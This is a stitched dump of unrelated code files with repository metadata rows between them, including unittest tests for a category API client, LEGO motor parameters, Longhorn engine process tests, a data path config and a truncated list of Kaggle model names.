self.assertEqual("Test 1", category.display_name)
self.assertEqual(1, len(category.sub_categories))
self.assertEqual("sub name", category.sub_categories[0].name)
self.assertEqual("sub display", category.sub_categories[0].display_name)
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
g.requests.get.assert_called_with("{}/categories/test".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_category_info_error(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 500
g.requests.get.return_value = response
self.assertRaises(ApplicationError, CategoryService.get_category_parent_info, "test")
g.requests.get.assert_called_with("{}/categories/test".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_sub_category_info(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": None,
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": None}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_sub_category_info("test", "parent")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(1, len(category.sub_categories))
self.assertEqual("sub name", category.sub_categories[0].name)
self.assertEqual("sub display", category.sub_categories[0].display_name)
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
self.assertIsNone(category.parent)
g.requests.get.assert_called_with("{}/categories/test/sub-categories/parent".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_sub_category_info_permission_filtered(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = []
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": None,
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": "abc"}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_sub_category_info("test", "abc")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(0, len(category.sub_categories))
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
self.assertIsNone(category.parent)
g.requests.get.assert_called_with("{}/categories/test/sub-categories/abc".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_sub_category_info_permission(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = ["parent-permission", "sub-permission"]
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": "parent-permission",
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": "sub-permission"}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_sub_category_info("test", "abc")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(1, len(category.sub_categories))
self.assertEqual("sub name", category.sub_categories[0].name)
self.assertEqual("sub display", category.sub_categories[0].display_name)
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
g.requests.get.assert_called_with("{}/categories/test/sub-categories/abc".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_sub_category_info_error(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 500
g.requests.get.return_value = response
self.assertRaises(ApplicationError, CategoryService.get_sub_category_info, "test", "abc")
g.requests.get.assert_called_with("{}/categories/test/sub-categories/abc".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_all_stat_provs(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 200
response.json.return_value = ["test stat prov"]
g.requests.get.return_value = response
stat_provs = CategoryService.get_all_stat_provs()
self.assertIsNotNone(stat_provs)
self.assertEqual(1, len(stat_provs))
self.assertEqual("test stat prov", stat_provs[0])
g.requests.get.assert_called_with("{}/statutory-provisions".format('abc'),
params={'selectable': True})
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_all_stat_provs_error(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 500
g.requests.get.return_value = response
self.assertRaises(ApplicationError, CategoryService.get_all_stat_provs)
g.requests.get.assert_called_with("{}/statutory-provisions".format('abc'),
params={'selectable': True})
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_all_instruments(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 200
response.json.return_value = ["test instrument"]
g.requests.get.return_value = response
instruments = CategoryService.get_all_instruments()
self.assertIsNotNone(instruments)
self.assertEqual(1, len(instruments))
self.assertEqual("test instrument", instruments[0])
g.requests.get.assert_called_with("abc/instruments")
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_all_instruments_error(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 500
g.requests.get.return_value = response
self.assertRaises(ApplicationError, CategoryService.get_all_instruments)
g.requests.get.assert_called_with("{}/instruments".format('abc'))
mock_current_app.logger.info.assert_called()
| 43.924335 | 103 | 0.599376 | 2,132 | 21,479 | 5.825516 | 0.0394 | 0.080918 | 0.055072 | 0.095652 | 0.953865 | 0.944042 | 0.926087 | 0.924235 | 0.921014 | 0.917391 | 0 | 0.009739 | 0.287676 | 21,479 | 488 | 104 | 44.014344 | 0.802026 | 0 | 0 | 0.842995 | 0 | 0 | 0.213138 | 0.111225 | 0 | 0 | 0 | 0 | 0.280193 | 1 | 0.041063 | false | 0 | 0.016908 | 0 | 0.060386 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
82b69e2e97da66f932b8c25052ca3961aa80e76e | 2,428 | py | Python | tests/motor/motor_info.py | alex93p/ev3dev-robopy | 4f7b37e78387dc7b0da9ca196154351e821bd628 | [
"MIT"
] | 1 | 2019-12-18T03:42:56.000Z | 2019-12-18T03:42:56.000Z | tests/motor/motor_info.py | alex93p/ev3dev-robopy | 4f7b37e78387dc7b0da9ca196154351e821bd628 | [
"MIT"
] | null | null | null | tests/motor/motor_info.py | alex93p/ev3dev-robopy | 4f7b37e78387dc7b0da9ca196154351e821bd628 | [
"MIT"
] | null | null | null | motor_info = {
'lego-ev3-l-motor': {'motion_type': 'rotation',
'count_per_rot': 360,
'max_speed': 1050,
'position_p': 80000,
'position_i': 0,
'position_d': 0,
'polarity': 'normal',
'speed_p': 1000,
'speed_i': 60,
'speed_d': 0 },
'lego-ev3-m-motor': {'motion_type': 'rotation',
'count_per_rot': 360,
'max_speed': 1560,
'position_p': 160000,
'position_i': 0,
'position_d': 0,
'polarity': 'normal',
'speed_p': 1000,
'speed_i': 60,
'speed_d': 0 },
'lego-nxt-motor': {'motion_type': 'rotation',
'count_per_rot': 360,
'max_speed': 1020,
'position_p': 80000,
'position_i': 0,
'position_d': 0,
'polarity': 'normal',
'speed_p': 1000,
'speed_i': 60,
'speed_d': 0 },
'fi-l12-ev3-50': {'motion_type': 'linear',
'count_per_m': 2000,
'full_travel_count': 100,
'max_speed': 24,
'position_p': 40000,
'position_i': 0,
'position_d': 0,
'polarity': 'normal',
'speed_p': 1000,
'speed_i': 60,
'speed_d': 0,
},
'fi-l12-ev3-100': {'motion_type': 'linear',
'count_per_m': 2000,
'full_travel_count': 200,
'max_speed': 24,
'position_p': 40000,
'position_i': 0,
'position_d': 0,
'polarity': 'normal',
'speed_p': 1000,
'speed_i': 60,
'speed_d': 0,
}
}
| 42.596491 | 52 | 0.302718 | 179 | 2,428 | 3.798883 | 0.22905 | 0.029412 | 0.073529 | 0.132353 | 0.908824 | 0.908824 | 0.908824 | 0.908824 | 0.908824 | 0.908824 | 0 | 0.122266 | 0.585667 | 2,428 | 56 | 53 | 43.357143 | 0.553678 | 0 | 0 | 0.732143 | 0 | 0 | 0.259061 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7d5c1d351f244710ac092766bee791fc77f94018 | 9,832 | py | Python | integration/instance/test_launcher_basic.py | Frankkkkk/longhorn-engine | ebc22c7abacbd960afae6693a9378c60fd0616cf | [
"Apache-2.0"
] | 1 | 2022-01-03T09:19:59.000Z | 2022-01-03T09:19:59.000Z | integration/instance/test_launcher_basic.py | Frankkkkk/longhorn-engine | ebc22c7abacbd960afae6693a9378c60fd0616cf | [
"Apache-2.0"
] | null | null | null | integration/instance/test_launcher_basic.py | Frankkkkk/longhorn-engine | ebc22c7abacbd960afae6693a9378c60fd0616cf | [
"Apache-2.0"
] | null | null | null | import tempfile
import pytest
from common.core import (
create_replica_process, create_engine_process,
delete_process,
wait_for_process_running, wait_for_process_error,
wait_for_process_deletion,
check_dev_existence, wait_for_dev_deletion,
upgrade_engine,
)
from common.constants import (
LONGHORN_UPGRADE_BINARY, SIZE,
PROC_STATE_RUNNING, PROC_STATE_STOPPING, PROC_STATE_STOPPED,
PROC_STATE_ERROR,
VOLUME_NAME_BASE, ENGINE_NAME_BASE, REPLICA_NAME_BASE,
)
from common.cli import ( # NOQA
em_client, pm_client, # NOQA
)
def test_start_stop_replicas(pm_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
for i in range(10):
tmp_dir = tempfile.mkdtemp()
name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=name, replica_dir=tmp_dir)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=name)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (i+1)
assert name in rs
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
for i in range(10):
rs = pm_client.process_list()
assert len(rs) == (10-i)
name = REPLICA_NAME_BASE + str(i)
r = pm_client.process_delete(name=name)
assert r.spec.name == name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, name)
rs = pm_client.process_list()
assert len(rs) == (9-i)
rs = pm_client.process_list()
assert len(rs) == 0
def test_process_creation_failure(pm_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
count = 5
for i in range(count):
tmp_dir = tempfile.mkdtemp()
name = REPLICA_NAME_BASE + str(i)
args = ["replica", tmp_dir, "--size", str(SIZE)]
pm_client.process_create(
name=name, binary="/opt/non-existing-binary", args=args,
port_count=15, port_args=["--listen,localhost:"])
wait_for_process_error(pm_client, name)
r = pm_client.process_get(name=name)
assert r.spec.name == name
assert r.status.state == PROC_STATE_ERROR
assert "no such file or directory" in r.status.error_msg
for i in range(count):
rs = pm_client.process_list()
assert len(rs) == (count-i)
name = REPLICA_NAME_BASE + str(i)
pm_client.process_delete(name=name)
wait_for_process_deletion(pm_client, name)
rs = pm_client.process_list()
assert len(rs) == (count-1-i)
rs = pm_client.process_list()
assert len(rs) == 0
def test_one_volume(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
replica_args = []
for i in range(3):
tmp_dir = tempfile.mkdtemp()
name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=name, replica_dir=tmp_dir)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=name)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (i+1)
assert name in rs
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + "0"
volume_name = VOLUME_NAME_BASE + "0"
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.process_list()
assert len(es) == 1
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.state == PROC_STATE_RUNNING
ps = pm_client.process_list()
assert len(ps) == 3
delete_process(em_client, engine_name)
# test duplicate call
delete_process(em_client, engine_name)
wait_for_process_deletion(em_client, engine_name)
# test duplicate call
delete_process(em_client, engine_name)
ps = pm_client.process_list()
assert len(ps) == 3
for i in range(3):
name = REPLICA_NAME_BASE + str(i)
r = pm_client.process_delete(name=name)
assert r.spec.name == name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, name)
ps = pm_client.process_list()
assert len(ps) == 0
def test_multiple_volumes(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
cnt = 5
for i in range(cnt):
replica_args = []
tmp_dir = tempfile.mkdtemp()
replica_name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client,
name=replica_name, replica_dir=tmp_dir)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == i+1
assert replica_name in rs
r = rs[replica_name]
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.process_list()
assert len(es) == i+1
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.state == PROC_STATE_RUNNING
ps = pm_client.process_list()
assert len(ps) == i+1
for i in range(cnt):
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
delete_process(em_client, engine_name)
wait_for_process_deletion(em_client, engine_name)
wait_for_dev_deletion(volume_name)
es = em_client.process_list()
assert len(es) == (cnt-1-i)
assert engine_name not in es
@pytest.mark.skip(reason="debug")
def test_engine_upgrade(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
dir_base = "/tmp/replica"
cnt = 3
for i in range(cnt):
replica_args = []
dir = dir_base + str(i)
replica_name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=replica_name,
replica_dir=dir)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == i+1
assert replica_name in rs
r = rs[replica_name]
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.process_list()
assert len(es) == i+1
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.state == PROC_STATE_RUNNING
dir = dir_base + "0"
engine_name = ENGINE_NAME_BASE + "0"
replica_name = REPLICA_NAME_BASE + "0"
volume_name = VOLUME_NAME_BASE + "0"
replica_name_upgrade = REPLICA_NAME_BASE + "0-upgrade"
r = create_replica_process(pm_client, name=replica_name_upgrade,
binary=LONGHORN_UPGRADE_BINARY,
replica_dir=dir)
assert r.spec.name == replica_name_upgrade
assert r.status.state == PROC_STATE_RUNNING
replicas = ["tcp://localhost:"+str(r.status.port_start)]
e = upgrade_engine(em_client, LONGHORN_UPGRADE_BINARY,
engine_name, volume_name, replicas)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
r = pm_client.process_delete(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, replica_name)
check_dev_existence(volume_name)
wait_for_process_running(em_client, engine_name)
es = em_client.process_list()
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.state == PROC_STATE_RUNNING
delete_process(em_client, engine_name)
wait_for_process_deletion(em_client, engine_name)
wait_for_dev_deletion(volume_name)
| 31.412141 | 77 | 0.636391 | 1,344 | 9,832 | 4.344494 | 0.070685 | 0.061654 | 0.074499 | 0.094537 | 0.827196 | 0.80459 | 0.778387 | 0.750128 | 0.744648 | 0.701147 | 0 | 0.005725 | 0.271562 | 9,832 | 312 | 78 | 31.512821 | 0.80955 | 0.007526 | 0 | 0.738397 | 0 | 0 | 0.018158 | 0.002462 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.021097 | false | 0 | 0.021097 | 0 | 0.042194 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7d6829b0f35065a2bdf176fd5c309745f7854184 | 777 | py | Python | opt.py | marcelsan/Deep-HdrReconstruction | 7cb0d93938baa6fbe029116451a661c18dfba49e | [
"BSD-3-Clause"
] | 80 | 2020-10-01T17:04:18.000Z | 2022-03-26T01:05:43.000Z | opt.py | marcelsan/Deep-HdrReconstruction | 7cb0d93938baa6fbe029116451a661c18dfba49e | [
"BSD-3-Clause"
] | null | null | null | opt.py | marcelsan/Deep-HdrReconstruction | 7cb0d93938baa6fbe029116451a661c18dfba49e | [
"BSD-3-Clause"
] | 17 | 2020-10-26T08:00:16.000Z | 2022-02-22T12:26:32.000Z | # Data default directories
# # Places HDR dataset
# TRAIN_IMAGES_DIR = '/media/marcelsantos/8e46ec36-35a2-4e28-824b-aea17a5c04c1/places-pretrain/train'
# VAL_IMAGES_DIR = '/media/marcelsantos/8e46ec36-35a2-4e28-824b-aea17a5c04c1/places-pretrain/trainval'
# HDR dataset
TRAIN_IMAGES_DIR = '/media/marcelsantos/8e46ec36-35a2-4e28-824b-aea17a5c04c1/hdr_images/train'
VAL_IMAGES_DIR = '/media/marcelsantos/8e46ec36-35a2-4e28-824b-aea17a5c04c1/hdr_images/trainval'
# Places inpainting dataset
# TRAIN_IMAGES_DIR = '/media/marcelsantos/26e14ba1-f2a1-4b9d-8b61-0b91b1c39c07/imagesPlaces205_resize/train'
# VAL_IMAGES_DIR = '/media/marcelsantos/26e14ba1-f2a1-4b9d-8b61-0b91b1c39c07/imagesPlaces205_resize/trainval'
# Mean/Std
MEAN = [0.485, 0.456, 0.406]
STD = [0.229, 0.224, 0.225] | 48.5625 | 109 | 0.803089 | 105 | 777 | 5.790476 | 0.342857 | 0.088816 | 0.138158 | 0.256579 | 0.825658 | 0.825658 | 0.792763 | 0.792763 | 0.792763 | 0.792763 | 0 | 0.206897 | 0.066924 | 777 | 16 | 110 | 48.5625 | 0.631724 | 0.65251 | 0 | 0 | 0 | 0 | 0.573077 | 0.573077 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
7d73ac769e15c9c7757389ca3f03ea4aa39ac48a | 300 | py | Python | test_core.py | QuentinAndre11/lecture-spring-2021 | 2f2b563e91ea6e18fe6cd3e9087f2fd0b2e2beee | [
"Apache-2.0"
] | null | null | null | test_core.py | QuentinAndre11/lecture-spring-2021 | 2f2b563e91ea6e18fe6cd3e9087f2fd0b2e2beee | [
"Apache-2.0"
] | null | null | null | test_core.py | QuentinAndre11/lecture-spring-2021 | 2f2b563e91ea6e18fe6cd3e9087f2fd0b2e2beee | [
"Apache-2.0"
] | null | null | null | from core import *
def test_add():
"""Check that `add()` works as expected"""
assert add(2, 3) == 5
def test_add_z():
"""Check that `add()` works as expected"""
assert add(2, 3, 1) == 6
def test_add_2():
"""Check that `add()` works as expected"""
assert add_2(3) == 5 | 15.789474 | 46 | 0.566667 | 48 | 300 | 3.416667 | 0.375 | 0.097561 | 0.182927 | 0.310976 | 0.707317 | 0.707317 | 0.707317 | 0.707317 | 0.707317 | 0.707317 | 0 | 0.048889 | 0.25 | 300 | 19 | 47 | 15.789474 | 0.68 | 0.366667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 1 | 0.428571 | true | 0 | 0.142857 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
81815b1fe8d8cd27aa38d55354594b4e716e10fb | 466 | py | Python | telepay/v1/__init__.py | TelePay-cash/telepay-python | 199151326950bd66c7ec4cba9e7d6de580742c8f | [
"MIT"
] | 2 | 2022-03-20T12:26:17.000Z | 2022-03-29T22:14:29.000Z | telepay/v1/__init__.py | TelePay-cash/telepay-python | 199151326950bd66c7ec4cba9e7d6de580742c8f | [
"MIT"
] | 8 | 2022-03-30T08:23:20.000Z | 2022-03-30T08:26:29.000Z | telepay/v1/__init__.py | TelePay-cash/telepay-python | 199151326950bd66c7ec4cba9e7d6de580742c8f | [
"MIT"
] | null | null | null | from ._async.client import TelePayAsyncClient # noqa: F401
from ._sync.client import TelePaySyncClient # noqa: F401
from .auth import TelePayAuth # noqa: F401
from .errors import TelePayError # noqa: F401
from .models.account import Account # noqa: F401
from .models.assets import Assets # noqa: F401
from .models.invoice import Invoice # noqa: F401
from .models.wallets import Wallets # noqa: F401
from .webhooks import TelePayWebhookListener # noqa: F401
| 46.6 | 59 | 0.774678 | 60 | 466 | 5.983333 | 0.333333 | 0.200557 | 0.267409 | 0.200557 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068528 | 0.154506 | 466 | 9 | 60 | 51.777778 | 0.84264 | 0.2103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
81d858125b01369508997140ffd15bfa0ef9e112 | 47 | py | Python | python_3/aula07b.py | felipesch92/CursoEmVideo | df443e4771adc4506c96d8f419aa7acb97b28366 | [
"MIT"
] | null | null | null | python_3/aula07b.py | felipesch92/CursoEmVideo | df443e4771adc4506c96d8f419aa7acb97b28366 | [
"MIT"
] | null | null | null | python_3/aula07b.py | felipesch92/CursoEmVideo | df443e4771adc4506c96d8f419aa7acb97b28366 | [
"MIT"
] | null | null | null | print(5+3*2)
print(3*5+4**2)
print(3*(5+4)**2)
| 11.75 | 17 | 0.553191 | 14 | 47 | 1.857143 | 0.357143 | 0.461538 | 0.538462 | 0.615385 | 0.730769 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.06383 | 47 | 3 | 18 | 15.666667 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 12 |
c49ab935f7784198fad409902cc192d0c2d1234a | 5,327 | py | Python | Crowdflower Search Results Relevance/src/model/generate_model_library.py | Tuanlase02874/Machine-Learning-Kaggle | c31651acd8f2407d8b60774e843a2527ce19b013 | [
"MIT"
] | 1 | 2018-07-11T16:20:43.000Z | 2018-07-11T16:20:43.000Z | Crowdflower Search Results Relevance/src/model/generate_model_library.py | Tuanlase02874/Machine-Learning-Kaggle | c31651acd8f2407d8b60774e843a2527ce19b013 | [
"MIT"
] | null | null | null | Crowdflower Search Results Relevance/src/model/generate_model_library.py | Tuanlase02874/Machine-Learning-Kaggle | c31651acd8f2407d8b60774e843a2527ce19b013 | [
"MIT"
] | null | null | null | import os
feat_names_all = [
## LSA_and_stats_feat_Jun09 (Low)
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_xgb_tree]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@kappa_xgb_linear]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_rf]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_svr]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_ridge]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_lasso]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@clf_skl_lr]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_libfm]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_keras_dnn]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_rgf]",
## LSA_svd150_and_Jaccard_coef_Jun14 (Low)
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_xgb_tree]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@kappa_xgb_linear]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_rf]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_svr]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_ridge]",
